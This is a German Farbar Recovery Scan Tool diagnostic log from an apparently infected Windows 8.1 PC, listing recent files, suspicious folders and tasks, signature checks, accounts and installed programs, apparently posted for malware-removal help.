2017-05-11 14:18 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-11 14:18 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-11 14:18 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-11 14:18 - 2017-04-16 09:52 - 01033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-05-11 14:18 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-11 14:18 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-11 14:18 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-11 14:18 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-11 14:18 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-11 14:18 - 2017-04-16 09:40 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-05-11 14:18 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-11 14:18 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-11 14:18 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-11 14:18 - 2017-04-16 09:23 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2017-05-11 14:18 - 2017-04-16 09:22 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-11 14:18 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-11 14:18 - 2017-04-16 09:17 - 00880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-05-11 14:18 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 00330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-11 14:18 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-11 14:18 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-11 14:18 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-11 14:18 - 2017-04-16 09:02 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2017-05-11 14:18 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-11 14:18 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-11 14:18 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-11 14:18 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-11 14:18 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-05-11 14:18 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-11 14:18 - 2017-04-10 00:00 - 01548640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-11 14:18 - 2017-04-10 00:00 - 00388448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-11 14:18 - 2017-04-08 01:20 - 01375960 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-11 14:18 - 2017-04-07 15:56 - 01094656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-11 14:18 - 2017-04-02 18:41 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-11 14:18 - 2017-04-02 18:41 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-11 14:18 - 2017-04-01 01:16 - 01968408 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-11 14:18 - 2017-03-31 23:59 - 01612504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-05-11 14:03 - 2017-05-11 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\NPASRE
2017-05-10 16:11 - 2017-05-10 16:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\My Games
2017-05-09 18:05 - 2017-05-09 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-4d03-1
2017-05-09 18:05 - 2017-05-09 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-1147-0
2017-05-09 13:11 - 2017-05-09 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\VNASRE
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{636564e6-512c-0}
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{55b52545-312c-1}
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{055b525f-612c-0}
2017-05-08 18:05 - 2017-05-08 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3db3-1
2017-05-08 18:05 - 2017-05-08 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-2227-0
2017-05-08 16:50 - 2017-05-08 16:50 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\ANSARE
2017-05-08 16:43 - 2017-05-08 16:43 - 00000000 ____D C:\Users\Public\Documents\temp
2017-05-08 16:43 - 2017-05-08 16:43 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-08 00:05 - 2017-05-08 00:05 - 00000000 ____D C:\ProgramData\f9d60eee-6423-0
2017-05-08 00:05 - 2017-05-08 00:05 - 00000000 ____D C:\ProgramData\f9d60eee-13c7-1
2017-05-07 18:05 - 2017-05-07 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6415-1
2017-05-07 18:05 - 2017-05-07 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3141-0
2017-05-07 15:12 - 2017-05-25 16:04 - 00000000 ____D C:\ProgramData\Orbit
2017-05-07 15:12 - 2017-05-07 15:12 - 00281688 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2017-05-07 15:12 - 2017-05-07 15:12 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\PunkBuster
2017-05-07 15:06 - 2017-05-25 16:04 - 00000000 ____D C:\Users\Nick Schuster\Documents\My Games
2017-05-07 14:58 - 2017-05-11 23:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Ubisoft Game Launcher
2017-05-07 14:51 - 2017-05-07 14:51 - 00000000 ____D C:\Windows\System32\Tasks\Games
2017-05-07 14:41 - 2017-05-07 14:41 - 00282512 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2017-05-07 14:41 - 2017-05-07 14:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 14:38 - 2017-05-07 14:38 - 00394296 _____ (Duplex Secure Ltd.) C:\Windows\system32\Drivers\sptd.sys
2017-05-07 14:03 - 2017-05-07 14:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Disc_Soft_Ltd
2017-05-07 13:50 - 2017-05-07 13:50 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2017-05-07 13:14 - 2017-05-07 13:53 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\DAEMON Tools Lite
2017-05-07 13:14 - 2017-05-07 13:14 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2017-05-07 13:14 - 2017-05-07 13:14 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2017-05-07 13:13 - 2017-05-07 13:13 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2017-05-05 18:05 - 2017-05-05 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3ba3-1
2017-05-05 18:05 - 2017-05-05 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-0291-0
2017-05-05 18:00 - 2017-05-05 18:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WinRAR
2017-05-05 14:10 - 2017-05-31 13:47 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\background_fault
2017-05-05 14:10 - 2017-05-05 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\WANARE
2017-05-05 14:10 - 2017-05-05 14:10 - 00000000 ____D C:\ProgramData\BIT
2017-05-04 00:06 - 2017-05-04 00:06 - 00000000 ____D C:\ProgramData\f9d60eee-5a03-0
2017-05-04 00:05 - 2017-05-04 00:06 - 00000000 ____D C:\ProgramData\f9d60eee-1c67-1

==================== Ein Monat: Ge鋘derte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-06-03 14:01 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-06-03 13:59 - 2016-11-16 18:46 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-06-03 13:59 - 2016-11-16 18:44 - 00000200 _____ C:\Users\Public\Documents\temp.dat
2017-06-03 13:58 - 2017-02-20 22:17 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Mozilla
2017-06-03 13:58 - 2016-07-31 16:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CrashDumps
2017-06-03 13:58 - 2015-12-26 17:46 - 00000000 __RDO C:\Users\Nick Schuster\OneDrive
2017-06-03 13:57 - 2015-12-26 22:26 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-03 13:57 - 2015-12-26 17:53 - 00000000 __SHD C:\Users\Nick Schuster\IntelGraphicsProfiles
2017-06-03 13:57 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-02 16:14 - 2016-06-01 16:03 - 01862144 ___SH C:\Users\Nick Schuster\Downloads\Thumbs.db
2017-06-02 14:40 - 2015-12-26 16:48 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3847841184-804715454-2304624315-1001
2017-06-01 23:52 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-06-01 21:52 - 2013-08-22 15:36 - 00000000 ____D C:\Program Files\Quick Tharks Screen Saver
2017-06-01 19:26 - 2015-12-29 20:54 - 00000000 ____D C:\Windows\pss
2017-06-01 12:01 - 2016-07-05 17:55 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Adblock Plus for IE
2017-06-01 12:00 - 2017-03-17 12:20 - 00003614 _____ C:\Windows\System32\Tasks\Milimili
2017-06-01 12:00 - 2017-03-17 12:19 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc
2017-06-01 12:00 - 2014-11-21 05:35 - 01776918 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-01 12:00 - 2014-11-21 04:45 - 00765582 _____ C:\Windows\system32\perfh007.dat
2017-06-01 12:00 - 2014-11-21 04:45 - 00159366 _____ C:\Windows\system32\perfc007.dat
2017-06-01 00:15 - 2017-01-03 13:21 - 00000000 ____D C:\ProgramData\windows
2017-05-31 17:34 - 2017-02-12 14:31 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Bluestacks
2017-05-31 17:34 - 2013-08-22 17:36 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-31 17:31 - 2016-06-14 20:57 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Sony
2017-05-31 16:11 - 2017-03-16 13:19 - 00001312 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-05-31 14:36 - 2016-11-23 19:13 - 01784108 _____ C:\spyhunter.fix
2017-05-31 13:52 - 2016-09-17 17:56 - 00000000 ____D C:\ProgramData\Apple
2017-05-31 12:18 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{E291433F-553A-F494-7993-5DB4F74EF600}
2017-05-31 12:18 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{1F88CA98-A823-7D33-19C2-25D7F85A3115}
2017-05-31 10:46 - 2017-03-17 14:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-30 19:32 - 2016-10-08 16:17 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Deployment
2017-05-30 14:12 - 2016-12-27 21:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-05-30 14:11 - 2015-12-27 21:26 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Google
2017-05-30 14:05 - 2017-02-03 12:28 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Samsung
2017-05-30 14:05 - 2017-02-03 12:27 - 00000000 ____D C:\Program Files (x86)\Samsung
2017-05-30 14:05 - 2016-10-23 18:05 - 00000000 ____D C:\ProgramData\Samsung
2017-05-29 23:08 - 2017-02-13 16:13 - 00000000 ____D C:\Program Files (x86)\Minecraft
2017-05-29 23:08 - 2016-12-10 12:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\.minecraft
2017-05-29 22:00 - 2016-01-02 17:50 - 00000306 __RSH C:\ProgramData\ntuser.pol
2017-05-29 21:59 - 2016-10-12 16:07 - 00000000 ____D C:\Program Files\Image-Line
2017-05-27 11:41 - 2016-01-11 18:42 - 07413248 ___SH C:\Users\Nick Schuster\Desktop\Thumbs.db
2017-05-26 18:19 - 2016-11-18 17:58 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-26 10:55 - 2016-01-04 18:15 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-25 15:49 - 2017-02-14 16:53 - 00000000 ____D C:\ProgramData\SUPPORTDIR
2017-05-25 15:49 - 2017-02-14 16:53 - 00000000 ____D C:\ProgramData\install_backup
2017-05-25 15:49 - 2017-02-03 12:27 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-25 15:49 - 2016-10-13 22:01 - 00000000 ____D C:\ProgramData\TEMP
2017-05-25 12:06 - 2017-04-13 12:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\SNARE
2017-05-24 11:40 - 2017-02-27 11:37 - 00000000 ____D C:\ProgramData\CanonIJPLM
2017-05-23 15:40 - 2013-08-22 17:20 - 00000000 ____D C:\Windows\CbsTemp
2017-05-23 15:34 - 2015-12-28 20:55 - 132223576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-23 15:34 - 2015-12-28 20:55 - 00000000 ____D C:\Windows\system32\MRT
2017-05-22 21:46 - 2015-12-27 00:10 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Skype
2017-05-22 21:24 - 2016-09-24 19:16 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-22 21:24 - 2015-12-27 00:10 - 00002715 _____ C:\Users\Public\Desktop\Skype.lnk
2017-05-22 21:24 - 2015-12-27 00:10 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-05-22 21:24 - 2015-12-27 00:10 - 00000000 ____D C:\ProgramData\Skype
2017-05-21 19:04 - 2015-12-26 22:50 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2017-05-21 19:03 - 2017-02-26 13:05 - 00000991 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 12.lnk
2017-05-21 19:03 - 2017-02-26 13:05 - 00000979 _____ C:\Users\Public\Desktop\TeamViewer 12.lnk
2017-05-17 21:05 - 2015-12-28 13:23 - 00000000 ____D C:\Users\Nick Schuster\Desktop\982652986578268672
2017-05-17 18:44 - 2016-08-20 12:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\TeamViewer
2017-05-17 17:00 - 2016-09-14 15:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Adobe
2017-05-17 16:58 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-05-17 16:41 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\FxsTmp
2017-05-16 15:15 - 2017-03-07 15:40 - 00000000 ____D C:\Users\Nick Schuster\.gimp-2.8
2017-05-14 22:50 - 2017-03-16 23:29 - 00000000 ____D C:\Users\Nick Schuster\Desktop\fl studio songs
2017-05-14 16:21 - 2016-07-31 16:03 - 05282048 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-14 16:16 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-13 00:45 - 2017-02-12 16:33 - 00000000 ____D C:\Users\Nick Schuster\Desktop\BSHelper
2017-05-11 15:22 - 2017-05-03 15:17 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-11 15:22 - 2017-04-20 12:31 - 00000000 _____ C:\Windows\SysWOW64\22
2017-05-11 15:22 - 2017-04-20 12:31 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-11 15:18 - 2016-09-17 17:52 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\vlc
2017-05-09 18:25 - 2016-11-08 22:46 - 00004496 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-05-09 18:25 - 2016-10-13 18:22 - 00004342 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-05-09 17:25 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\Macromed
2017-05-08 20:37 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{30a66e80-412c-0}
2017-05-08 20:37 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{0f4d7d53-512c-0}
2017-05-08 20:37 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{00d223fb-612c-1}
2017-05-07 13:44 - 2017-04-10 13:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AMD
2017-05-07 13:41 - 2017-03-17 12:20 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Kyubey
2017-05-07 13:38 - 2017-04-19 14:08 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\3DM
2017-05-07 13:34 - 2017-04-06 23:28 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\clean
2017-05-07 13:16 - 2016-12-17 15:58 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Chromium
2017-05-07 12:24 - 2017-05-03 17:06 - 00000000 _____ C:\Windows\SysWOW64\4
2017-05-05 17:00 - 2017-04-26 17:00 - 00000000 ____D C:\Insist
2017-05-05 17:00 - 2017-03-30 21:00 - 00003520 _____ C:\Windows\System32\Tasks\Windows-PG
2017-05-05 16:02 - 2017-04-25 13:12 - 00000000 ____D C:\Windows\psgo
2017-05-04 00:15 - 2017-05-03 17:35 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Apple Computer
2017-05-04 00:15 - 2017-05-03 17:35 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Apple Computer

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-12-12 23:28 - 2016-12-12 23:28 - 0001120 _____ () C:\Users\Nick Schuster\AppData\Roaming\.minecraft - Verkn黳fung.lnk
2010-08-28 22:43 - 2010-08-28 22:43 - 0096256 ____N (Google, inc) C:\Users\Nick Schuster\AppData\Roaming\AdbWinApi.dll
2010-08-28 22:43 - 2010-08-28 22:43 - 0060928 ____N (Google, inc) C:\Users\Nick Schuster\AppData\Roaming\AdbWinUsbApi.dll
2016-07-31 15:02 - 2016-07-31 15:02 - 7129600 _____ () C:\Users\Nick Schuster\AppData\Roaming\agent.dat
2017-01-03 13:27 - 2017-01-03 13:20 - 1052256 _____ () C:\Users\Nick Schuster\AppData\Roaming\avv.exe
2016-07-31 15:01 - 2016-07-31 15:01 - 0129024 _____ () C:\Users\Nick Schuster\AppData\Roaming\Installer.dat
2016-07-31 15:02 - 2016-07-31 15:02 - 0018432 _____ () C:\Users\Nick Schuster\AppData\Roaming\Main.dat
2016-07-31 15:03 - 2016-02-18 10:10 - 5267952 _____ () C:\Users\Nick Schuster\AppData\Roaming\ziptool_wc-9015_setup.exe
2017-04-04 00:34 - 2017-04-04 13:52 - 0000000 _____ () C:\Users\Nick Schuster\AppData\Roaming\Microsoft\taskhw.exe
2017-03-07 15:59 - 2017-03-07 15:59 - 0003330 _____ () C:\Users\Nick Schuster\AppData\Local\recently-used.xbel
2016-01-07 17:00 - 2016-12-17 21:05 - 0007598 _____ () C:\Users\Nick Schuster\AppData\Local\Resmon.ResmonCfg
2017-02-12 14:36 - 2017-04-22 20:22 - 0000552 _____ () C:\Users\Nick Schuster\AppData\Local\TroubleshooterConfig.json
2016-10-21 22:16 - 2016-10-23 18:04 - 0000158 _____ () C:\Users\Nick Schuster\AppData\Local\uts.ini

Einige Dateien in TEMP:
====================
C:\Users\Nick Schuster\AppData\Local\Temp\BluestacksUninstaller.exe
C:\Users\Nick Schuster\AppData\Local\Temp\HD-LibraryHandler.dll
C:\Users\Nick Schuster\AppData\Local\Temp\HD-Logger-Native.dll
C:\Users\Nick Schuster\AppData\Local\Temp\svhost.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix f黵 Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2017-05-23 15:34

==================== Ende von FRST.txt ============================
         
--- --- ---

[/CODE]

Code:
ATTFilter
Zus鋞zliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:13-04-2016
durchgef黨rt von Nick Schuster (2017-06-03 14:02:57)
Gestartet von C:\Users\Nick Schuster\AppData\Local\Microsoft\Windows\INetCache\IE\BPT3LC5O
Windows 8.1 (X64) (2015-12-26 14:37:47)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3847841184-804715454-2304624315-500 - Administrator - Disabled)
Gast (S-1-5-21-3847841184-804715454-2304624315-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3847841184-804715454-2304624315-1003 - Limited - Enabled)
Nick Schuster (S-1-5-21-3847841184-804715454-2304624315-1001 - Administrator - Enabled) => C:\Users\Nick Schuster

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" k鰊nen in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe After Effects CC 2015 (HKLM-x32\...\{147EC100-14BE-45EF-AB42-35BAEE7D02F0}) (Version: 13.6.1 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Photoshop CS6 Version 13.0.1 (HKLM-x32\...\{A724DC44-6241-42D3-BA57-778B178ABC17}_is1) (Version: 13.0.1 - Adobe Systems, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.7.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.4.4 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.7.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.20.13 - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 5.2.0 - Canon Inc.)
Canon MG5700 series Benutzerregistrierung (HKLM-x32\...\Canon MG5700 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG5700 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5700_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.3.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.1.2 - )
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio 12.1.2 (HKLM\...\FL Studio 12.1.2_is1) (Version:  - )
FL Studio ASIO (HKLM\...\FL Studio ASIO) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
FreeOCR v5.4 (HKLM-x32\...\freeocr_is1) (Version:  - )
GIMP 2.8.20 (HKLM\...\GIMP-2_is1) (Version: 2.8.20 - The GIMP Team)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
HandBrake 0.10.5 (HKLM-x32\...\HandBrake) (Version: 0.10.5 - )
initialpage123 - Uninstall (HKLM-x32\...\{F566FB96-67A4-4E6C-B262-2AE76A61F74F}) (Version:  - )
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MegaDownloader 1.7 (HKLM\...\{C12C2297-65A4-4E64-9AE1-29F0D947FDA0}}_is1) (Version: 1.7 - AppsForMega.info)
Microsoft OneDrive (HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
